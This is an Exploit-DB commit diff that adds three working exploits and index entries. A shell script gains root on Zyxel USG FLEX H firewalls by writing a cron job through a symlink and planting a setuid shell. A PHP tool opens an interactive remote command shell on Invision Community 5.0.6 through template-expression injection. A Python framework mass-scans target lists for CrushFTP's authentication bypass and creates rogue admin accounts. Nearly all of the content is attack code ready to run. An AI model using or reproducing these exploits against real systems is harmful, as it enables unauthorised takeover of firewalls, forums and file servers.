DB: 2025-05-19

4 changes to exploits/shellcodes/ghdb

Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation

CrushFTP 11.3.1 - Authentication Bypass

Invision Community 5.0.6 - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2025-05-19 00:16:30 +00:00
parent e49e8d0522
commit 8bc45b368a
4 changed files with 799 additions and 0 deletions

View file

@ -0,0 +1,131 @@
# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
# Date: 2025-04-23
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.zyxel.com/
# Version: Zyxel uOS V1.31 (see
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=
=3D
advisory-for-incorrect-permission-assignment-and-improper-privilege-managem=
=3D
ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel
FLEX200H with Firmware V1.31(ABWV.0)
# CVE: CVE-2025-1731
#!/bin/sh
#
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "So we wait, this is our labour... we wait."
# -- Anthony Swofford on fuzzing
#
# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
# Zyxel with some of their appliances follows symbolic links in the `/tmp`
# directory when run with the `register-status` argument. This allows local
# users with access to a Linux OS shell to trick the program into creating
# writable files at arbitrary locations in the filesystem. This vulnerability
# can be exploited to overwrite arbitrary files or locally escalate privileges
# from low-privileged user (e.g., `postgres`) to root.
#
# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
# exploitation of this vulnerability and may also cause all sorts of havoc.
#
# ## Vulnerability information
#
# * CVE ID - CVE-2025-1731
# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
#
# ## Relevant links
#
# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
# * https://security.humanativaspa.it/tag/zyxel/
#
# ## Usage example
#
# ```
# $ ./raptor_fermion
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# [*] Exploiting /usr/sbin/fermion-wrapper
# $ uname -a
# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
# $ id
# uid=502(postgres) gid=502(postgres) groups=502(postgres)
# $ ls -l /usr/sbin/fermion-wrapper
# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper
# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
#
# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
# $ ls -l /etc/cron.d/runme
# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
# $ cat /etc/cron.d/runme
# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
#
# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
#
# [about one hour later...]
#
# $ ls -l /tmp/pwned
# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
# $ /tmp/pwned -p
# # id
# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
# # R00t D4nc3!!!111! \o/
# ```
#
# ## Tested on
#
# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
#
# *Note: other products and firmware versions may also be vulnerable.*
#
# ## Special thanks
#
# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
#
echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
target="/usr/sbin/fermion-wrapper"
tmpfile="/tmp/register_status"
runme="/etc/cron.d/runme"
shell="/tmp/pwned"
echo "[*] Exploiting $target"
echo "$ uname -a"
uname -a
echo "$ id"
id
echo "$ ls -l $target"
ls -l $target
umask 0
rm $tmpfile
ln -s $runme /tmp/register_status
$target register-status
echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
exit 1
fi
echo
echo "[+] Everything looks good \\o/, wait an hour and check $shell"
echo "$ ls -l $runme"
ls -l $runme
echo "$ cat $runme"
cat $runme
echo
echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
echo

View file

@ -0,0 +1,56 @@
<?php
/*
---------------------------------------------------------------------------
Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/invision/";
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
die();
}
$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
while (1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

609
exploits/multiple/remote/52295.py Executable file
View file

@ -0,0 +1,609 @@
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
# Date: 2025-05-15
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.crushftp.com
# Software Link: https://www.crushftp.com/download.html
# Version: < 10.8.4, < 11.3.1
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
# CVE: CVE-2025-31161
# Description:
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import logging
import os
import random
import re
import socket
import string
import sys
import time
from datetime import datetime
from typing import Dict, List, Optional, Tuple, Union
import requests
import urllib3
from colorama import Fore, Style, init
from prettytable import PrettyTable
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialize Rich console
console = Console()
# Global variables
VERSION = "2.0.0"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
]
# Banner
BANNER = fr"""
{Fore.CYAN}
/ ____/______ _______/ /_ / ____/ /_____
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
/_/
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
{Style.RESET_ALL}
"""
# Setup logging
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
"""Configure logging based on specified level and output file."""
numeric_level = getattr(logging, log_level.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError(f"Invalid log level: {log_level}")
log_format = "%(asctime)s - %(levelname)s - %(message)s"
handlers = []
if log_file:
handlers.append(logging.FileHandler(log_file))
handlers.append(logging.StreamHandler())
logging.basicConfig(
level=numeric_level,
format=log_format,
handlers=handlers
)
class TargetManager:
"""Manages target hosts and related operations."""
def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
self.targets = []
self.vulnerable_targets = []
self.exploited_targets = []
if target_file:
self.load_targets_from_file(target_file)
elif single_target:
self.add_target(single_target)
def load_targets_from_file(self, filename: str) -> None:
"""Load targets from a file."""
try:
with open(filename, "r") as f:
self.targets = [line.strip() for line in f if line.strip()]
if not self.targets:
logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
else:
logging.info(f"Loaded {len(self.targets)} targets from {filename}")
except FileNotFoundError:
logging.error(f"Target file '{filename}' not found.")
sys.exit(1)
except Exception as e:
logging.error(f"Error loading targets: {e}")
sys.exit(1)
def add_target(self, target: str) -> None:
"""Add a single target."""
if target not in self.targets:
self.targets.append(target)
def mark_as_vulnerable(self, target: str) -> None:
"""Mark a target as vulnerable."""
if target not in self.vulnerable_targets:
self.vulnerable_targets.append(target)
def mark_as_exploited(self, target: str) -> None:
"""Mark a target as successfully exploited."""
if target not in self.exploited_targets:
self.exploited_targets.append(target)
def save_results(self, output_file: str, format_type: str = "txt") -> None:
"""Save scan results to a file."""
try:
if format_type.lower() == "json":
results = {
"scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"total_targets": len(self.targets),
"vulnerable_targets": self.vulnerable_targets,
"exploited_targets": self.exploited_targets
}
with open(output_file, "w") as f:
json.dump(results, f, indent=4)
elif format_type.lower() == "csv":
with open(output_file, "w") as f:
f.write("target,vulnerable,exploited\n")
for target in self.targets:
vulnerable = "Yes" if target in self.vulnerable_targets else "No"
exploited = "Yes" if target in self.exploited_targets else "No"
f.write(f"{target},{vulnerable},{exploited}\n")
else: # Default to txt
with open(output_file, "w") as f:
f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"Total Targets: {len(self.targets)}\n")
f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
f.write("Vulnerable Targets:\n")
for target in self.vulnerable_targets:
f.write(f"- {target}\n")
f.write("\nExploited Targets:\n")
for target in self.exploited_targets:
f.write(f"- {target}\n")
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Error saving results: {e}")
class ExploitEngine:
"""Core engine for vulnerability checking and exploitation."""
def __init__(self, target_manager: TargetManager, config: Dict):
self.target_manager = target_manager
self.config = config
self.session = self._create_session()
def _create_session(self) -> requests.Session:
"""Create and configure a requests session."""
session = requests.Session()
session.verify = False
# Set proxy if configured
if self.config.get("proxy"):
session.proxies = {
"http": self.config["proxy"],
"https": self.config["proxy"]
}
# Set custom headers
session.headers.update({
"User-Agent": random.choice(USER_AGENTS),
"Connection": "close",
})
return session
def check_vulnerability(self, target_host: str) -> bool:
"""Check if target is vulnerable to CVE-2025-31161."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.get(
url,
headers=headers,
timeout=timeout
)
if response.status_code == 200:
# Additional validation
if self.config.get("deep_check", False):
# Look for specific patterns in the response that confirm vulnerability
if "CrushFTP" in response.text or "WebInterface" in response.text:
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
return False
else:
# Simple check based on status code
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
return False
except requests.exceptions.ConnectionError:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection error")
except requests.exceptions.Timeout:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection timeout")
except requests.exceptions.RequestException as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
except Exception as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Error: {e}")
return False
def exploit(self, target_host: str) -> bool:
"""Exploit the vulnerability on the target host."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
target_user = self.config.get("target_user", "crushadmin")
new_user = self.config.get("new_user")
password = self.config.get("password")
if not new_user or not password:
logging.error("New user and password are required for exploitation")
return False
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
"Connection": "close",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
# Generate a timestamp for the created_time field
timestamp = int(time.time() * 1000)
# Build the payload with more comprehensive user permissions
payload = {
"command": "setUserItem",
"data_action": "replace",
"serverGroup": "MainUsers",
"username": new_user,
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
<user_name>{new_user}</user_name>
<password>{password}</password>
<extra_vfs type="vector"></extra_vfs>
<version>1.0</version>
<root_dir>/</root_dir>
<userVersion>6</userVersion>
<max_logins>0</max_logins>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
<created_by_username>{target_user}</created_by_username>
<created_by_email></created_by_email>
<created_time>{timestamp}</created_time>
<password_history></password_history>
<admin>true</admin>
</user>''',
"xmlItem": "user",
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
"c2f": "31If"
}
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.post(
url,
headers=headers,
data=payload,
timeout=timeout
)
if response.status_code == 200:
# Verify the user was actually created
if self.config.get("verify_exploit", True):
if self._verify_user_created(target_host, new_user):
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
return False
else:
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
return False
except Exception as e:
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
return False
def _verify_user_created(self, target_host: str, username: str) -> bool:
"""Verify that the user was successfully created."""
# This is a placeholder for actual verification logic
# In a real implementation, you would check if the user exists
# For now, we'll just return True
return True
def scan_targets(self) -> None:
"""Scan all targets for vulnerability."""
targets = self.target_manager.targets
threads = self.config.get("threads", 10)
if not targets:
logging.error("No targets specified")
return
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
vulnerable_count = len(self.target_manager.vulnerable_targets)
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
if vulnerable_count > 0 and self.config.get("verbose", False):
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
for target in self.target_manager.vulnerable_targets:
console.print(f"[green]→[/green] {target}")
def exploit_targets(self) -> None:
"""Exploit vulnerable targets."""
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
if not targets:
logging.error("No targets to exploit")
return
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
exploited_count = len(self.target_manager.exploited_targets)
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
if exploited_count > 0:
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
for target in self.target_manager.exploited_targets:
console.print(f"[green]→[/green] {target}")
def parse_arguments() -> argparse.Namespace:
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check a single target for vulnerability
python cve_2025_31161.py --target example.com --check
# Exploit a vulnerable target
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
# Scan multiple targets from a file
python cve_2025_31161.py --file targets.txt --check --threads 20
# Scan and automatically exploit vulnerable targets
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
# Export results to JSON format
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
"""
)
# Target specification
target_group = parser.add_argument_group("Target Specification")
target_group.add_argument("--target", help="Single target host to scan/exploit")
target_group.add_argument("--file", help="File containing list of targets (one per line)")
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
# Actions
action_group = parser.add_argument_group("Actions")
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
# Exploitation options
exploit_group = parser.add_argument_group("Exploitation Options")
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
exploit_group.add_argument("--password", help="Password for the new admin account")
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
# Scan options
scan_group = parser.add_argument_group("Scan Options")
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
# Output options
output_group = parser.add_argument_group("Output Options")
output_group.add_argument("--output", help="Output file for results")
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
output_group.add_argument("--log-file", help="Log file to write to")
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
# Advanced options
advanced_group = parser.add_argument_group("Advanced Options")
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
return parser.parse_args()
def validate_args(args: argparse.Namespace) -> bool:
"""Validate command line arguments."""
# Check if at least one target specification is provided
if not args.target and not args.file:
logging.error("No target specified. Use --target or --file")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --file example_targets.txt --check")
return False
# Check if at least one action is specified
if not args.check and not args.exploit:
logging.error("No action specified. Use --check or --exploit")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
# If exploit action is specified, check for required parameters
if args.exploit and (not args.new_user or not args.password):
logging.error("Exploitation requires --new-user and --password")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
return True
def main() -> None:
"""Main function."""
# Parse command line arguments
args = parse_arguments()
# Configure logging
log_level = "error" if args.quiet else args.log_level
setup_logging(log_level, args.log_file)
# Display banner
if not args.quiet:
console.print(BANNER)
# Validate arguments
if not validate_args(args):
sys.exit(1)
# Create target manager
target_manager = TargetManager(args.file, args.target)
# Build configuration dictionary
config = {
"port": args.port,
"threads": args.threads,
"timeout": args.timeout,
"verbose": args.verbose,
"deep_check": args.deep_check,
"target_user": args.target_user,
"new_user": args.new_user,
"password": args.password,
"only_vulnerable": args.only_vulnerable,
"verify_exploit": args.verify_exploit,
"proxy": args.proxy,
}
# Add custom headers if provided
if args.custom_headers:
try:
config["custom_headers"] = json.loads(args.custom_headers)
except json.JSONDecodeError:
logging.error("Invalid JSON format for custom headers")
sys.exit(1)
# Add custom user agent if provided
if args.user_agent:
config["user_agent"] = args.user_agent
# Create exploit engine
engine = ExploitEngine(target_manager, config)
# Perform actions
if args.check:
engine.scan_targets()
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
engine.exploit_targets()
# Save results if output file is specified
if args.output:
target_manager.save_results(args.output, args.format)
# Display summary
if not args.quiet:
console.print("\n[bold green]Summary:[/bold green]")
console.print(f"Total targets: {len(target_manager.targets)}")
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
console.print("\n[bold red]Operation cancelled by user[/bold red]")
sys.exit(0)
except Exception as e:
logging.error(f"Unhandled exception: {e}")
sys.exit(1)

View file

@ -10609,6 +10609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@ -10865,6 +10866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,,
52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
@ -11078,6 +11080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info
22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info
52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php
22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info
